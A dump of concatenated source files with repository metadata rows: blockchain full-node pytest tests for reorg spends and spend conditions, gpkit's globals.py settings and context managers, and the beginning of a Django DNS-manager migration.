receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
receiver_2_puzzlehash = WALLET_A_PUZZLE_HASHES[2]
receiver_3_puzzlehash = WALLET_A_PUZZLE_HASHES[3]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
blocks[:5],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_2 = None
for coin in run_and_get_removals_and_additions(
new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM, test_constants.COST_PER_BYTE
)[1]:
if coin.puzzle_hash == receiver_1_puzzlehash:
coin_2 = coin
break
assert coin_2 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_2_puzzlehash, coin_2)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:6],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_3 = None
for coin in run_and_get_removals_and_additions(
new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM, test_constants.COST_PER_BYTE
)[1]:
if coin.puzzle_hash == receiver_2_puzzlehash:
coin_3 = coin
break
assert coin_3 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_3_puzzlehash, coin_3)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:7],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_cb_coin(self, two_nodes):
num_blocks = 15
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spends a coinbase created in reorg
new_blocks = bt.get_consecutive_blocks(
5,
blocks[:6],
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = new_blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_since_genesis(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1, blocks, seed=b"", farmer_reward_puzzle_hash=coinbase_puzzlehash, transaction_data=spend_bundle
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
# Spends a coin in a genesis reorg, that was already spent
new_blocks = bt.get_consecutive_blocks(
12,
[],
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_assert_my_coin_id(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
spend_block = blocks[2]
bad_block = blocks[3]
spend_coin = None
bad_spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
for coin in list(bad_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
bad_spend_coin = coin
valid_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [spend_coin.name()])
valid_dic = {valid_cvp.opcode: [valid_cvp]}
bad_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [bad_spend_coin.name()])
bad_dic = {bad_cvp.opcode: [bad_cvp]}
bad_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, bad_dic)
valid_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, valid_dic)
assert bad_spend_bundle is not None
assert valid_spend_bundle is not None
# Invalid block bundle
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bad_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_MY_COIN_ID_FAILED
# Valid block bundle
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=valid_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_coin_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.name(), b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_COIN_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_puzzle_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.puzzle_hash, b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_height_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 10
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_ABSOLUTE, [int_to_bytes(10)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 10
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_ABSOLUTE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 11, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_height_relative(self, two_nodes):
num_blocks = 11
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 11
# This condition requires block1 coinbase to be spent more than 10 block after it was farmed
# block index has to be greater than (2 + 9 = 11)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_RELATIVE, [int_to_bytes(9)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 11
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_HEIGHT_RELATIVE_FAILED
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
res, _, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
# At index 12, it can be spent
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_relative(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent 300 seconds after coin creation
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_RELATIVE, [int_to_bytes(300)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 300 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_RELATIVE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=301,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_seconds_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after 30 seconds from now
current_time_plus3 = uint64(blocks[-1].foliage_transaction_block.timestamp + 30)
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_SECONDS_ABSOLUTE, [int_to_bytes(current_time_plus3)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent to early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
time_per_block=20,
guarantee_transaction_block=True,
)
# Try to validate that block before 30 sec
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_SECONDS_ABSOLUTE_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
time_per_block=31,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
@pytest.mark.asyncio
async def test_assert_fee_condition(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires fee to be 10 mojo
cvp_fee = ConditionWithArgs(ConditionOpcode.RESERVE_FEE, [int_to_bytes(10)])
# This spend bundle has 9 mojo as fee
block1_dic_bad = {cvp_fee.opcode: [cvp_fee]}
block1_dic_good = {cvp_fee.opcode: [cvp_fee]}
block1_spend_bundle_bad = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_bad, fee=9
)
block1_spend_bundle_good = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic_good, fee=10
)
log.warning(block1_spend_bundle_good.additions())
log.warning(f"Spend bundle fees: {block1_spend_bundle_good.fees()}")
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_bad,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.RESERVE_FEE_CONDITION_FAILED
valid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle_good,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(valid_new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
| 39.764012 | 115 | 0.680292 |
ace0a020585fb61ae290b56cf430a66102487d6a | 4,350 | py | Python | gpkit/gpkit/globals.py | UCLA-StarAI/LearnFairNB | f922d885399955737bd9f16a104f700004cd3846 | [
"Fair"
] | 3 | 2019-07-07T17:29:49.000Z | 2021-03-20T18:52:28.000Z | gpkit/globals.py | sichu366/gpkit | a8999737980ba45682e6e00770cf4546ca5337af | [
"MIT"
] | 1 | 2019-11-23T22:26:05.000Z | 2019-11-23T22:26:05.000Z | gpkit/gpkit/globals.py | UCLA-StarAI/LearnFairNB | f922d885399955737bd9f16a104f700004cd3846 | [
"Fair"
] | null | null | null | "global mutable variables"
import os
from collections import defaultdict
from . import build
def load_settings(path=None, firstattempt=True):
"Load the settings file at SETTINGS_PATH; return settings dict"
if path is None:
path = os.sep.join([os.path.dirname(__file__), "env", "settings"])
try:
with open(path) as settingsfile:
lines = [line[:-1].split(" : ") for line in settingsfile
if len(line.split(" : ")) == 2]
settings_ = {name: value.split(", ") for name, value in lines}
for name, value in settings_.items():
# hack to flatten 1-element lists,
# unless they're the solver list
if len(value) == 1 and name != "installed_solvers":
settings_[name] = value[0]
except IOError:
settings_ = {"installed_solvers": [""]}
if settings_["installed_solvers"] == [""]:
if firstattempt:
print("Found no installed solvers, beginning a build.")
build()
settings_ = load_settings(path, firstattempt=False)
if settings_["installed_solvers"] != [""]:
settings_["just built!"] = True
else:
print("""
=============
Build failed! :(
=============
You may need to install a solver and then `import gpkit` again;
see https://gpkit.readthedocs.io/en/latest/installation.html
for troubleshooting details.
But before you go, please post the output above
(starting from "Found no installed solvers, beginning a build.")
to gpkit@mit.edu or https://github.com/convexengineering/gpkit/issues/new
so we can prevent others from having to see this message.
Thanks! :)
""")
settings_["default_solver"] = settings_["installed_solvers"][0]
settings_["latex_modelname"] = True
return settings_
settings = load_settings()
SIGNOMIALS_ENABLED = set() # the current signomial permissions
class SignomialsEnabled(object):
"""Class to put up and tear down signomial support in an instance of GPkit.
Example
-------
>>> import gpkit
>>> x = gpkit.Variable("x")
>>> y = gpkit.Variable("y", 0.1)
>>> with SignomialsEnabled():
>>> constraints = [x >= 1-y]
>>> gpkit.Model(x, constraints).localsolve()
"""
# pylint: disable=global-statement
def __enter__(self):
SIGNOMIALS_ENABLED.add(True)
def __exit__(self, type_, val, traceback):
SIGNOMIALS_ENABLED.remove(True)
VECTORIZATION = [] # the current vectorization shape
class Vectorize(object):
"""Creates an environment in which all variables are
exended in an additional dimension.
"""
def __init__(self, dimension_length):
self.dimension_length = dimension_length
def __enter__(self):
"Enters a vectorized environment."
VECTORIZATION.insert(0, self.dimension_length)
def __exit__(self, type_, val, traceback):
"Leaves a vectorized environment."
VECTORIZATION.pop(0)
MODELS = [] # the current model hierarchy
MODELNUMS = [] # modelnumbers corresponding to MODELS, above
# lookup table for the number of models of each name that have been made
MODELNUM_LOOKUP = defaultdict(int)
# the list of variables named in the current MODELS/MODELNUM environment
NAMEDVARS = defaultdict(list)
def reset_modelnumbers():
"Zeroes all model number counters"
for key in MODELNUM_LOOKUP:
MODELNUM_LOOKUP[key] = 0
def begin_variable_naming(model):
"Appends a model name and num to the environment."
MODELS.append(model)
num = MODELNUM_LOOKUP[model]
MODELNUMS.append(num)
MODELNUM_LOOKUP[model] += 1
return num, (tuple(MODELS), tuple(MODELNUMS))
def end_variable_naming():
"Pops a model name and num from the environment."
NAMEDVARS.pop((tuple(MODELS), tuple(MODELNUMS)), None)
MODELS.pop()
MODELNUMS.pop()
class NamedVariables(object):
"""Creates an environment in which all variables have
a model name and num appended to their varkeys.
"""
def __init__(self, model):
self.model = model
def __enter__(self):
"Enters a named environment."
begin_variable_naming(self.model)
def __exit__(self, type_, val, traceback):
"Leaves a named environment."
end_variable_naming()
| 31.071429 | 79 | 0.650345 |
ace0a0246b42daad8693833ea9dbd90cbf5cf0cf | 14,718 | py | Python | dnsmanager/migrations/0001_initial.py | erdnaxe/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 8 | 2019-12-21T10:07:49.000Z | 2021-08-27T23:51:54.000Z | dnsmanager/migrations/0001_initial.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 6 | 2019-12-21T09:45:14.000Z | 2021-03-27T10:14:28.000Z | dnsmanager/migrations/0001_initial.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 3 | 2020-07-19T23:15:53.000Z | 2021-03-26T19:00:20.000Z | # Generated by Django 2.2.8 on 2019-12-19 11:14
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, help_text='The domain name for which this record is valid, ending in a dot.', max_length=253, verbose_name='name')),
('dns_class', models.CharField(choices=[('IN', 'IN (Internet)'), ('CS', 'CS (CSNET, obsolete)'), ('CH', 'CH (CHAOS)'), ('HS', 'HS (Hesiod)')], default='IN', help_text="You shouldn't need anything else than IN.", max_length=2, verbose_name='class')),
('ttl', models.PositiveIntegerField(default=3600, help_text='Limits the lifetime of this record.', null=True, verbose_name='Time To Live')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_dnsmanager.record_set+', to='contenttypes.ContentType')),
],
options={
'verbose_name': 'record',
'verbose_name_plural': 'records',
'ordering': ['zone', 'name'],
},
),
migrations.CreateModel(
name='Zone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=253, unique=True, validators=[django.core.validators.RegexValidator(message='Not a valid domain name', regex='(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-)\\.)*(?:[a-zA-Z0-9][a-zA-Z0-9-]{0,62}(?<!-))')], verbose_name='name')),
('slug', models.SlugField(help_text='This zone will be accessible at /dns/{slug}/.', max_length=253, unique=True, verbose_name='slug')),
],
options={
'verbose_name': 'zone',
'verbose_name_plural': 'zones',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='AddressRecord',
fields=[
('record_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='dnsmanager.Record')),
('address', models.GenericIPAddressField(protocol='IPv4', verbose_name='IPv4 address')),
],
options={
